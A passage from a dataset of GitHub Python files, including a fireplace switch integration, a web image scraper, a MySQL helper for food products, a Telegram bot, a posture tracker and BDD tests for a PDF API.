description=description)\n for description in EFIRE_SWITCHES\n if description.key == \"continuous_pilot\"\n or getattr(data.device.features, description.key, False)\n )\n\n\nclass EfireSwitch(NapoleonEfireEntity, SwitchEntity):\n \"\"\"Define an Efire Switch.\"\"\"\n\n entity_description: EfireSwitchEntityDescription\n\n async def async_turn_on(self, **kwargs: Any) -> None:\n \"\"\"Turn on the switch.\"\"\"\n await self.entity_description.on_fn(self.coordinator.device)\n await self.coordinator.async_request_refresh()\n\n async def async_turn_off(self, **kwargs: Any) -> None:\n \"\"\"Turn off the switch.\"\"\"\n await self.entity_description.off_fn(self.coordinator.device)\n await self.coordinator.async_request_refresh()\n\n @property\n def is_on(self) -> bool | None:\n \"\"\"Return the on state.\"\"\"\n return self.entity_description.value_fn(self.coordinator.data)\n","repo_name":"kaechele/napoleon-efire","sub_path":"custom_components/napoleon_efire/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38012251940","text":"class queue:\n def __init__(self):\n self.items = []\n\n def len(self):\n return len(self.items)\n\n def enqueue(self, items):\n for i in items:\n self.items.append(i)\n\n def dequeue(self, num):\n l = []\n real_num = num if num <= self.len() else self.len()\n while (real_num):\n l.append(self.items.pop(0))\n real_num -= 1\n return l\n\n def to_string(self):\n return \" \".join(str(x) for x in self.items)\n\n\nclass queue_operator:\n def __init__(self):\n self.dequeue_queue = []\n\n def oper(self, s, op):\n if(op[0] == \"out\"):\n for i in (s.dequeue(op[1])):\n self.dequeue_queue.append(i)\n elif(op[0] == \"in\"):\n s.enqueue(op[1:])\n return\n\n def len(self):\n return len(self.dequeue_queue)\n\n def to_string(self):\n return \" \".join(str(x) for x in self.dequeue_queue)\n\n\nif __name__ == \"__main__\":\n q = queue()\n qop = queue_operator()\n\n _ = input()\n nums = [int(x) for x in input().split()]\n q.enqueue(nums)\n\n op = [int(x) if x.isnumeric() else x for x in input().split()]\n qop.oper(q, op)\n\n op = [int(x) if x.isnumeric() else x for x in input().split()]\n qop.oper(q, op)\n\n if(q.len() == 0):\n print(\"len = 0\")\n else:\n print(f\"len = {q.len()}, data = {q.to_string()}\")\n if(qop.len() == 0):\n 
print(\"len = 0\")\n else:\n print(f\"len = {qop.len()}, data = {qop.to_string()}\")\n","repo_name":"Micuks/code","sub_path":"python/py_4/b_queue.py","file_name":"b_queue.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"31292473227","text":"from collections import defaultdict\r\n\r\n\r\ndef compute_totals(totals: defaultdict(int), uomes: list) -> defaultdict(int):\r\n \"\"\"\r\n Receive in input a dictionary containing previous computed totals and a list of\r\n UOMe with this form: {borrower, lender, value}. The output is a\r\n dictionary that associates to each user (borrower or lender) his own total.\r\n \"\"\" \r\n\r\n for uome in uomes:\r\n totals[uome[0]] -= uome[2] \r\n totals[uome[1]] += uome[2]\r\n \r\n return totals\r\n\r\n\r\ndef borrowers_and_lenders(totals_dict: dict) -> (dict, dict):\r\n \"\"\"\r\n Receive input a dictionary with a total associated to each user. \r\n Outputs are two dictionaries listing borrowers and lenders with their\r\n respective total debt or credit\r\n \"\"\"\r\n\r\n borrowers = {} \r\n lenders = {}\r\n \r\n for user in totals_dict:\r\n if totals_dict[user] > 0:\r\n lenders[user] = totals_dict[user]\r\n elif totals_dict[user] < 0:\r\n borrowers[user] = abs(totals_dict[user])\r\n\r\n return borrowers, lenders\r\n\r\n\r\ndef debt_simplification(borrowers: dict, lenders: dict) -> dict:\r\n \"\"\"\r\n Inputs are two dictionaries containing borrowers and lenders.\r\n The output is a list of simplified UOMe {lender, borrower, value}\r\n \"\"\"\r\n \r\n simplified_debt = defaultdict(dict)\r\n for lender in sorted(lenders):\r\n for borrower in sorted(borrowers):\r\n credit, debit = lenders[lender], borrowers[borrower]\r\n \r\n if credit != 0 and debit != 0:\r\n transaction_value = min(credit, debit)\r\n simplified_debt[borrower][lender] = transaction_value\r\n\r\n if lenders[lender] >= borrowers[borrower]:\r\n lenders[lender] -= transaction_value\r\n borrowers[borrower] = 0\r\n else:\r\n lenders[lender] = 0\r\n borrowers[borrower] -= transaction_value\r\n \r\n return dict(simplified_debt)\r\n\r\n\r\ndef update_total_debt(current_totals: defaultdict(int), new_uomes: list) -> (defaultdict(int), dict):\r\n \"\"\"\r\n Get the new state of the user graph when given a list of new UOMe's\r\n \"\"\"\r\n\r\n new_totals = compute_totals(current_totals, new_uomes)\r\n new_user_debt = debt_simplification(*borrowers_and_lenders(new_totals))\r\n\r\n return new_totals, new_user_debt\r\n","repo_name":"ric2b/confidential-debt-simplification","sub_path":"main_server/main_server_app/services/simplify_debt.py","file_name":"simplify_debt.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"7273003416","text":"from bs4 import BeautifulSoup\nimport requests\nfrom urllib.parse import urlparse, urljoin\nimport argparse\nimport os\nimport time\n\n\n# PROBLEM: Create a program with a function called 'spider' that recursively extracts all the images from a website.\n# The function should receive a url and a path as arguments. 
The path is the directory where the images will be saved.\n# '-r' means that the spider will download the images from the first page.\n# '-l 3' means that the spider will go 3 levels deep in the website.\n\n\n# First parse the url given by the user\ndef get_links(url):\n    url_components = urlparse(url) # Parse the url (analyze and split it)\n    url = url if url_components.scheme else url_components._replace(scheme='http').geturl() # If the url doesn't have a scheme, add http\n\n    page_content = requests.get(url) # Get the content of the url\n    html = page_content.content # Get the content of the page\n    \n    soup = BeautifulSoup(html, 'html.parser') # Parse the html\n\n    links = []\n    for link in soup.find_all('a', href=True):\n        if link['href'].startswith('http') or link['href'].startswith('https'): # if the link is an absolute url, keep it\n            full_link_url = urljoin(url, link['href'])\n            links.append(full_link_url)\n        else:\n            continue \n    return links\n\n# Recursive function that extracts all the links from a website\ndef recursive_links(url, level):\n    visited_links = set()\n    links_stack = [url]\n    visited_links.add(url)\n    while level > 0 and links_stack:\n        current_link = links_stack.pop()\n        level -= 1\n        links = get_links(current_link)\n        for link in links:\n            print(link)\n            if link not in visited_links:\n                links_stack.append(link)\n                visited_links.add(link)\n    return visited_links\n\n# Function that extracts the title of a website\ndef get_title(url):\n\n    response = requests.get(url)\n\n    html = response.content\n\n    soup = BeautifulSoup(html, 'html.parser')\n\n    title = soup.find('title').text\n    return title\n\n# Function that extracts all the images from a website\ndef get_images(url, path):\n    url_components = urlparse(url) # Parse the url (analyze and split it)\n    url = url if url_components.scheme else url_components._replace(scheme='http').geturl() # If the url doesn't have a scheme, add http\n    main_url = url_components.scheme + '://' + url_components.netloc + '/'\n\n    page_content = requests.get(url) # Get the content of the url\n    html = page_content.content # Get the content of the page\n    \n    soup = BeautifulSoup(html, 'html.parser') # Parse the html\n\n    # Create a directory to save the images if it doesn't exist\n    os.makedirs(path, exist_ok=True)\n\n    #print(f\"\\n \\n Downloading images from {url} \\n \\n\")\n\n    for image in soup.find_all('img'):\n        image_url = image.get('src')\n        #print(f\"\\n \\n original url: {image_url}\")\n        try:\n            if image_url and (image_url.startswith('http') or image_url.startswith('https')): # if the image has an absolute src url\n                full_image_url = urljoin(url, image_url)\n                print(f\"full url: {full_image_url}\")\n                image_content = requests.get(full_image_url) # Get the content of the image\n                image_filename = os.path.join(path, image_url.split('/')[-1]) # Get the filename of the image\n                with open(image_filename, 'wb') as f: # Write the image in the directory\n                    f.write(image_content.content)\n                print(f'Image {image_filename} downloaded')\n            elif image_url:\n                full_image_url = urljoin(main_url, image_url)\n                print(f\"full url: {full_image_url}\")\n                image_content = requests.get(full_image_url) # Get the content of the image\n                image_filename = os.path.join(path, image_url.split('/')[-1]) # Get the filename of the image\n                with open(image_filename, 'wb') as f: # Write the image in the directory\n                    f.write(image_content.content)\n                #print(f'Image {image_filename} downloaded')\n        except Exception as e:\n            print(e)\n            continue\n\n# Main function where the user can 
choose the options\ndef main():\n    parser = argparse.ArgumentParser(prog ='Spider', description='Scraping tool to web images', epilog='Arachnida exercise from cybersecurity bootcamp of 42 Urduliz')\n    parser.add_argument('-d', '--description', action='store_true', help='description of the program')\n    parser.add_argument('-t', '--title', action='store_true', help='title of the page')\n\n    parser.add_argument('-r', '--recursive_links', action='store_true', help='links in the page')\n    parser.add_argument('-l', '--level', type=int, default = 5, help='level of recursion')\n    parser.add_argument('-p', '--path', default = \"./data\", help='PATH to save the images')\n    \n    parser.add_argument('url', help='URL of the page to process')\n\n    args = parser.parse_args()\n    \n\n    if args.description:\n        print('This program will print the title and links of a given URL')\n    if args.title:\n        print(get_title(args.url))\n    if args.recursive_links:\n        print('This program will print all links in a given URL')\n        start_time = time.time()\n        for i in recursive_links(args.url, args.level):\n            print(i)\n            get_images(i, args.path)\n        print(f\"--- {(time.time() - start_time)} seconds ---\")\n\nif __name__ == '__main__':\n    main()","repo_name":"AppacheAZ/Arachnida","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"34614585564","text":"#! /usr/bin/env python3\n# coding: utf-8\nimport private as p\nimport mysql.connector\nfrom mysql.connector import errorcode\n\nTABLES = {}\nTABLES['off'] = (\n    \"CREATE TABLE IF NOT EXISTS off (\"\n    \"EAN BIGINT PRIMARY KEY NOT NULL,\"\n    \"Name VARCHAR(150) NOT NULL,\"\n    \"Category SMALLINT,\"\n    \"Stores VARCHAR(150),\"\n    \"Grade CHAR(1) NOT NULL,\"\n    \"URL Char(50) NOT NULL,\"\n    \"CONSTRAINT fk_category_off_cat FOREIGN KEY off(Category)\"\n    \"REFERENCES categories(id)\"\n    \")ENGINE=InnoDB\")\nTABLES['mysubstituts'] = (\n    \"CREATE TABLE IF NOT EXISTS mysubstituts (\"\n    \"EAN BIGINT NOT NULL,\"\n    \"Origin BIGINT NOT NULL,\"\n    \"CONSTRAINT fk_EAN_subs_off FOREIGN KEY mysubstituts(EAN)\"\n    \"REFERENCES off(EAN),\"\n    \"CONSTRAINT fk_EAN_osubs_off FOREIGN KEY mysubstituts(Origin)\"\n    \"REFERENCES off(EAN)\"\n    \")ENGINE=InnoDB\")\nTABLES['categories'] = (\n    \"CREATE TABLE IF NOT EXISTS categories (\"\n    \"id SMALLINT PRIMARY KEY AUTO_INCREMENT,\"\n    \"Name VARCHAR(15) NOT NULL UNIQUE\"\n    \")ENGINE=InnoDB\")\nCATEGORIES = ('Laits', 'Beurres', 'Farines', 'Sodas', 'Pains')\n\n\nclass init_db():\n    # Class that connects the program to the database\n    # and initialises the Tables if needed.\n    def __init__(self):\n        # Initialisation of the db connector and creation of the tables\n        # required, also fills the category table with the CATEGORIES list\n        try:\n            self.con = mysql.connector.connect(host=p.host, user=p.user,\n                                               passwd=p.passwd,\n                                               database=p.dbname)\n            self.curs = self.con.cursor()\n        except mysql.connector.Error as err:\n            if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n                print(\"Something is wrong with your user name or password\")\n            else:\n                print('Something went wrong when trying to connect \\\n                    to the database')\n            return None\n        self.create_tables()\n        self.put_categories()\n\n    def create_tables(self):\n        # Function that creates the tables\n        self.curs.execute(TABLES['categories'])\n        self.curs.execute(TABLES['off'])\n        self.curs.execute(TABLES['mysubstituts'])\n\n    def put_categories(self):\n        # Function that fills the category table\n        for item in CATEGORIES:\n            try:\n
                self.curs.execute('INSERT ignore INTO categories(Name) VALUES \\\n                    (\\'' + item + '\\')')\n            except mysql.connector.Error as err:\n                print('Categories already in database\\n')\n        self.con.commit()\n\n    def erase(self):\n        # Function that erases all the tables, only used when this file is\n        # executed alone\n        self.curs.execute('drop table mysubstituts,off,categories;')\n\n\nclass select():\n    def __init__(self, cursor):\n        # initialisation of the db cursor\n        self.curs = cursor\n\n    def cat_name_from_id(self, id):\n        # Function that returns the name of the category from its id\n        query = 'SELECT Name FROM categories WHERE id like {}'.format(id)\n        self.curs.execute(query)\n        for item in self.curs:\n            cat_name = item[0]\n        return cat_name\n\n    def cat_dict_id_name(self):\n        # Function that returns a dict of the categories id and name, used to\n        # print the selection screen of the category\n        self.curs.execute(\"select * from categories order by id\")\n        categories = {str(a): b for (a, b) in self.curs}\n        return categories\n\n    def prod_10_rand(self, query):\n        # Function that returns 10 random products from the selected category\n        self.curs.execute(query)\n        prods = [a for a in self.curs]\n        return prods\n\n    def get_sub(self, category, product_ean):\n        # Function that returns one substitute that isn't the selected product,\n        # from the same category and with equal or better nutrition_grade_fr\n        query = 'select EAN from off where (EAN!=' + str(product_ean) + ' and \\\n            Category=' + str(category) + ' and Grade<=(select Grade from off \\\n            where EAN=' + str(product_ean) + ')) order by rand() limit 1;'\n        self.curs.execute(query)\n        sub = [a for a in self.curs]\n        return sub[0][0]\n\n    def get_sub_list(self):\n        # Function that returns the list of all the previously saved substitutes\n        self.curs.execute('select off.EAN,Name,URL,Grade,Category from \\\n            off inner join mysubstituts on off.EAN = mysubstituts.EAN;')\n        eans = [a for a in self.curs]\n        return eans\n\n    def get_prod_from_ean(self, ean):\n        # Function that returns a product's information from its EAN\n        self.curs.execute('select EAN,Name,URL,Grade,Category,Stores \\\n            from off where EAN=' + str(ean) + ';')\n        product = [str(a) for a in self.curs]\n        return product\n\n    def get_ean_of_origin(self, sub_ean):\n        # Function that returns the substituted product's ean from\n        # the substitute's ean\n        query = 'select Origin from mysubstituts where EAN=' +\\\n            str(sub_ean) + ';'\n        self.curs.execute(query)\n        ean = [a for a in self.curs]\n        return ean[0][0]\n\n\ndef main():\n    db = init_db()\n    db.erase()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"linor78/OFF_P5","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"5732641988","text":"#!/usr/bin/env python3\n\n'''\nGet list of pairs of incompatible poses \nbecause only seen at one same position in chains\n'''\n\nimport numpy as np\nimport argparse\n\n#######################################\nparser = argparse.ArgumentParser(description=__doc__,\n                formatter_class=argparse.RawDescriptionHelpFormatter)\nparser.add_argument('graph', help=\"graph of poses connectivity, in npz\")\nparser.add_argument('--npz', help=\"output in npz format\")\nparser.add_argument('--npy', help=\"output in npy format\")\nparser.add_argument('--txt', help=\"output in txt format\")\nargs = parser.parse_args()\n#######################################\n\ndef get_single_position_pairs(pools):\n    # Get list of pairs of poses 
non-connectable\n # because only seen at one same position in chain\n all_pairs = set()\n nfrag = len(pools)\n #compare each pool to union of other pool\n for i in range(nfrag):\n pool = pools[i]\n for j in range(nfrag):\n if i != j:\n pool = [ i for i in pool if i not in pools[j]]\n pairs = set([ (a, b) for a in pool for b in pool if a1:\n\t\t\t\t\t\tword = porter_stemmer.stem(word)\n\t\t\t\t\t\tnew_sent = new_sent + word + ' '\n\t\t\tnew_sent = new_sent.strip()\n\t\t\tnew_sent = new_sent +'. '\n\t\tnewlist.append(new_sent)\n\t\tprint(len(newlist))\n\tprint(len(newlist))\n\tse = pd.Series(newlist)\n\tx['porter_stop'] = se.values\n\treturn x\n\n\n#Remove stopwords (nltk) and Porter stemming\nif __name__ == '__main__':\n\tp = Pool(10)\n\tdf = pd.read_pickle('./data.pkl')\n\tprint(df)\t\n\ttendf = np.array_split(df,10)\n\tprint(tendf[3])\n\tresult = p.map(f, [tendf[0], tendf[1], tendf[2], tendf[3],tendf[4], tendf[5],tendf[6], tendf[7],tendf[8], tendf[9]])\n\tp.close()\n\tfinal = pd.concat(list(result))\n\tprint(final)\n\tfinal = pd.DataFrame(final)\n\tfinal.to_pickle('./data.pkl')\n\n","repo_name":"cnclabs/codes.fin.attention","sub_path":"XRR/Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6975158369","text":"from sqlalchemy import select\n\nfrom telebot import TeleBot\nfrom telebot.types import Message, CallbackQuery\nfrom telebot import types\n\nfrom database import authors, books, conn\n\n\nclass User:\n def __init__(self, first_name: str, last_name: str, age: int, chat_id: int):\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n self.chat_id = chat_id\n\n def __repr__(self):\n return f'User(first name: {self.first_name}, last_name: {self.last_name}, age: {self.age})'\n\n\nusers: list[User | None] = []\nnew_user: User | None = None\n\n\nBOT_TOKEN: str = ''\n\nbot = TeleBot(BOT_TOKEN)\n\n\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message: Message):\n bot.send_message(chat_id=message.chat.id,\n text='''Привет! 
Это телеграм бот мастерской по Python!\\\n Советую нажать для начала на /something :) \\nА чтобы познакомиться, можешь нажать на /reg \n \\nЕсли хочешь почитать что-нибудь по Python, нажми /all_books!\n \\nСсылки на остальные матералы можешь получить по тегу /info''')\n\n\n@bot.message_handler(commands=['info'])\ndef info(message: Message):\n notion_url: str = 'https://educated-ambert-8c7.notion.site/Python-f340b5dcdad248f2acc5a26afd79e7ec'\n\n key_board = types.InlineKeyboardMarkup(\n [\n [types.InlineKeyboardButton(text='GitHub',\n url='https://github.com/arikmaster22/workshop-python'\n )\n ],\n\n [types.InlineKeyboardButton(text='Notion',\n url=notion_url\n )\n ],\n ]\n )\n\n bot.send_message(chat_id=message.chat.id,\n text='Ссылки на материалы', reply_markup=key_board)\n\n\ndef parse_books(data):\n parsed_books: list[str | None] = [None] * len(data)\n for i in range(len(data)):\n select_query_author_name = select(authors.c.name).where(data[i][2] == authors.c.id)\n\n author_name = conn.execute(select_query_author_name).scalar()\n\n parsed_books[i] = f'Title: {data[i][1]}\\nAuthor: {author_name}\\nPrice: {data[i][4]}\\nGenre: {data[i][3]}'\n\n return parsed_books\n\n\n@bot.message_handler(commands=['all_books'])\ndef send_books(message: Message):\n select_query = select(books)\n\n result = conn.execute(select_query).all()\n\n parsed_books = parse_books(result)\n\n for book in parsed_books:\n bot.send_message(chat_id=message.chat.id, text=book)\n\n\n@bot.message_handler(commands=['something'])\ndef send_something(message: Message):\n bot.send_message(chat_id=message.chat.id,\n text=\"Тыкни!\", parse_mode='HTML',\n disable_web_page_preview=True)\n\n\n@bot.message_handler(commands=['reg'])\ndef reg(message: Message):\n text: str = 'Введи свое имя, фамилию и возраст в формате фамилия имя возраст. 
Например, Муниев Аркадий 30 лет'\n\n    bot.send_message(chat_id=message.chat.id, text=text)\n\n    bot.register_next_step_handler(message=message, callback=signup)\n\n\n@bot.message_handler(content_types=['text'])\ndef signup(message: Message):\n    parse_message = message.text.split()\n\n    if len(parse_message) <= 3:\n        bot.send_message(chat_id=message.chat.id, text='Чего-то не хватает :(')\n        bot.register_next_step_handler(message=message, callback=signup)\n    elif len(parse_message) == 4:\n        try:\n            first_name, last_name, age = parse_message[0], parse_message[1], int(parse_message[2])\n\n            global new_user\n\n            new_user = User(first_name=first_name, last_name=last_name,\n                            age=age, chat_id=message.chat.id)\n\n            keyboard = types.InlineKeyboardMarkup() # клавиатура\n            key_yes = types.InlineKeyboardButton(\n                text='Да', callback_data='yes') # кнопка «Да»\n            keyboard.add(key_yes) # добавление кнопки в клавиатуру\n\n            key_no = types.InlineKeyboardButton(\n                text='Нет', callback_data='no') # кнопка «Нет»\n            keyboard.add(key_no) # добавление кнопки в клавиатуру\n\n            question = f'Тебя зовут {first_name}, {last_name} и тебе {age} лет?'\n            bot.send_message(message.from_user.id, text=question, reply_markup=keyboard)\n        except ValueError:\n            bot.send_message(chat_id=message.chat.id, text='Неправильно ввел возраст')\n            bot.register_next_step_handler(message=message, callback=signup)\n    else:\n        bot.send_message(chat_id=message.chat.id, text='Слишком много параметров')\n        bot.register_next_step_handler(message=message, callback=signup)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_worker(call: CallbackQuery):\n    if call.data == \"yes\": # call.data это callback_data, которую мы указали при объявлении кнопки\n        users.append(new_user)\n        print(users)\n        bot.send_message(chat_id=call.message.chat.id, text='Запомню :)')\n    elif call.data == \"no\":\n        bot.send_message(chat_id=call.message.chat.id, text='Введи еще раз свое имя, фамилию и возраст')\n        bot.register_next_step_handler_by_chat_id(\n            call.message.chat.id, callback=signup)\n\n\nif __name__ == '__main__':\n    bot.infinity_polling()\n","repo_name":"arikmaster22/workshop-python","sub_path":"telebot-and-sqlalchemy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"70628205353","text":"import cv2\nimport mediapipe as mp\n\nclass VideoCamera(object):\n    def __init__(self):\n        self.video = cv2.VideoCapture(0)\n        self.mp_drawing = mp.solutions.drawing_utils\n        self.mp_drawing_styles = mp.solutions.drawing_styles\n        self.mp_pose = mp.solutions.pose\n        self.pose = self.mp_pose.Pose(min_detection_confidence = 0.5, min_tracking_confidence = 0.5)\n        self.height = self.video.get(4)\n        self.good_left = 0\n        self.good_right = 0\n\n    def __del__(self):\n        self.video.release()\n    \n    def get_frame(self):\n        success, frame = self.video.read()\n        ret, jpeg = cv2.imencode('.jpg', frame)\n        return jpeg.tobytes()\n\n    def calculatePercentage(self, l_shldr_y, r_shldr_y):\n        range = self.height - self.good_left\n        relative = l_shldr_y - self.good_left\n        percentage = 0\n        # if(self.good_left == 0 and self.good_right == 0): \n        #     print(\"Press P to record your position, or q to quit!\")\n        if(l_shldr_y > self.good_left + 15 or r_shldr_y > self.good_right + 15):\n            percentage = 100- ((relative/range) * 100)\n            if (percentage <= 0):\n                percentage = 0\n            # print(\"BAD POSTURE, %\", percentage)\n        else:\n            percentage = 100\n            # print(\"GOOD POSTURE!, %\", percentage)\n        return percentage\n\n    def processPosture(self):\n        success, 
image = self.video.read()\n        image.flags.writeable = False\n        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n        results = self.pose.process(image)\n\n        #drawing indication lines\n        image.flags.writeable = True\n        image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n        self.mp_drawing.draw_landmarks(\n            image,\n            results.pose_landmarks,\n            self.mp_pose.POSE_CONNECTIONS,\n            landmark_drawing_spec=self.mp_drawing_styles.get_default_pose_landmarks_style()\n        )\n\n\n        # Use lm and lmPose as representative of the following methods.\n        # Process the image.\n        keypoints = self.pose.process(image)\n        lm = keypoints.pose_landmarks\n        lmPose = self.mp_pose.PoseLandmark\n        h,w = image.shape[:2]\n\n\n        #flip image horizontally for mirrored view\n        cv2.imshow('MediaPipe Pose', cv2.flip(image, 1))\n\n        # wait for user to type in p \n        if cv2.waitKey(1) == ord('p'):\n            print('POSITION RECORDED!')\n            self.good_left = int(lm.landmark[lmPose.LEFT_SHOULDER].y * h) \n            self.good_right = int(lm.landmark[lmPose.RIGHT_SHOULDER].y * h)\n\n        l_shldr_y = int(lm.landmark[lmPose.LEFT_SHOULDER].y * h)\n        r_shldr_y = int(lm.landmark[lmPose.RIGHT_SHOULDER].y * h)\n\n        return self.calculatePercentage(l_shldr_y, r_shldr_y)\n    \n\n    # variables made for convenience\n    # mp_drawing = mp.solutions.drawing_utils\n    # mp_drawing_styles = mp.solutions.drawing_styles\n    # mp_pose = mp.solutions.pose\n    # cap = cv2.VideoCapture(0)\n\n\n    # pose = mp_pose.Pose(min_detection_confidence = 0.5, min_tracking_confidence = 0.5)\n    # while webcam is running\n\n\n    #returns the percentage of how good your posture is \n\n\n","repo_name":"aerann/StandingTall","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"13718802939","text":"from fastapi.testclient import TestClient\nfrom behave import given, when, then\nfrom app.test.mockers.pdf_mocker import build_pdf_with_default_params\nfrom app.main import app\nfrom fastapi import status\nfrom app.api.models.pdf import Status\n\n\n# Create a TestClient instance to interact with the FastAPI application\ntest_app = TestClient(app=app)\n\nglobal_pdf_name = ''\nglobal_response = None\nglobal_data = None\n\n@given('That there is a PDF that needs to be updated with the name \"{pdf_name}\"')\ndef step_given_that_there_is_a_pdf_with_the_name(context, pdf_name):\n    global global_pdf_name\n    global global_data\n    global_pdf_name = pdf_name\n    pdf = build_pdf_with_default_params()\n    pdf.nome = pdf_name\n    global_data = pdf.dict()\n    test_app.post(\"/pdfs\", json=pdf.dict())\n\n@given('That there isnt a PDF registered with the name \"{pdf_name}\"')\ndef step_given_that_there_is_no_pdf_with_the_name(context, pdf_name):\n    pass\n\n@when(u'I send an UPDATE request to /pdfs/\"{pdf_name}\"')\ndef step_when_send_update_request_by_name(context, pdf_name):\n    global global_response\n    global global_pdf_name\n\n    # Store the expected PDF name for later validation\n    global_pdf_name = pdf_name\n\n    endpoint = f\"/pdfs/{global_pdf_name}\"\n\n    global_data['status'] = Status.CONCLUIDO\n    updated_data = global_data\n\n    # Send the UPDATE request\n    global_response = test_app.put(endpoint, json=updated_data)\n\n@then(\"the UPDATE by name response status code should be 200 OK\")\ndef step_then_check_status_code_ok(context):\n    global global_response\n    assert global_response.status_code == status.HTTP_200_OK\n\n@then(\"the UPDATE by name response status code should be 400 BAD REQUEST\")\ndef step_then_check_status_code_bad_request(context):\n    
global global_response\n assert global_response.status_code == status.HTTP_400_BAD_REQUEST\n\n@then('the PDF with the name \"{pdf_name}\" status should be \"{new_status}\"')\ndef step_then_the_pdf_with_the_name_should_have_status(context, pdf_name, new_status):\n global global_response\n endpoint = f\"/pdfs/{pdf_name}\"\n response = test_app.get(endpoint)\n global_response = response\n assert global_response.json()[\"status\"] == getattr(Status, new_status)","repo_name":"ArthurSudbrackIbarra/T1-Metodos-e-Modelos","sub_path":"app/test/features/steps/update_pdf_by_name.py","file_name":"update_pdf_by_name.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"53643109","text":"import typing\n\nfrom search.martylib.protobuf_utils.repeated import replace_in_repeated\nfrom search.martylib.core.logging_utils import configure_binlog\nfrom search.martylib.test_utils import TestCase\n\nfrom search.mon.tickenator_on_db.src.reducers.progress_steps.task_runners.base_create_task_runner import BaseCreateTaskStepRunner\nfrom search.mon.warden.proto.structures import component_pb2, duty_pb2, owner_pb2\nfrom search.mon.tickenator_on_db.proto.structures import manual_ticket_pb2\n\n\nclass TestAssigneeFollowersDuty(TestCase):\n\n @classmethod\n def setUpClass(cls):\n configure_binlog(\n 'tickenator',\n loggers=('tickenator', 'martylib', 'zephyr'),\n stdout=True,\n )\n\n def _check_duty_assignee_followers(\n self,\n child_component: component_pb2.Component,\n parent_component: component_pb2.Component,\n correct_duty: typing.List[str],\n correct_assignee: str,\n correct_followers: typing.List[str],\n manual_ticket: typing.Optional[manual_ticket_pb2.ManualTicket] = None,\n functionality_duty: typing.Optional[typing.Iterable[duty_pb2.DutyRecord]] = None\n ):\n runner = BaseCreateTaskStepRunner()\n duty = runner._get_duty([parent_component, child_component], functionality_duty if functionality_duty else [], False)\n self.assertListEqual(duty, correct_duty)\n assignee, followers = runner._get_assignee_and_followers(parent_component, child_component, manual_ticket, duty)\n self.assertEqual(assignee, correct_assignee)\n self.assertListEqual(followers, correct_followers)\n\n def test_owners(self):\n child_component = component_pb2.Component(\n duty_list=component_pb2.DutyList(on_duty=[\n duty_pb2.OnDuty(login='a'), duty_pb2.OnDuty(login='b')\n ]),\n owner_list=[owner_pb2.Owner(login='a'), owner_pb2.Owner(login='c'), owner_pb2.Owner(login='d')]\n )\n parent_component = component_pb2.Component()\n\n replace_in_repeated(child_component.protocol_settings.tickenator_settings.incident_followers, ['b', 'e'])\n replace_in_repeated(parent_component.protocol_settings.tickenator_settings.incident_followers, ['f'])\n\n child_component.protocol_settings.assign_on_duty = True\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b'], 'a', ['b', 'e', 'a'])\n\n child_component.protocol_settings.add_owner_to_ticket_followers = True\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b'], 'a', ['b', 'c', 'd', 'e', 'a'])\n\n replace_in_repeated(child_component.protocol_settings.tickenator_settings.incident_followers, [])\n child_component.protocol_settings.assign_on_duty = False\n self._check_duty_assignee_followers(child_component, parent_component, ['a', 'b'], 'a', ['c', 'd', 'f', 'a', 'b'])\n\n child_component = component_pb2.Component(\n 
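Condensed, the round-trip those update steps exercise is just a PUT followed by a GET. The sketch below is illustrative: the /pdfs/{name} endpoints come from the steps themselves, while the helper name, the payload handling, and the bare 200 check are assumptions of mine.

from fastapi.testclient import TestClient
from app.main import app

client = TestClient(app=app)

def update_and_fetch(pdf_name: str, payload: dict) -> dict:
    # PUT the edited record, then GET it back to confirm the change persisted.
    put_response = client.put(f"/pdfs/{pdf_name}", json=payload)
    assert put_response.status_code == 200
    return client.get(f"/pdfs/{pdf_name}").json()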
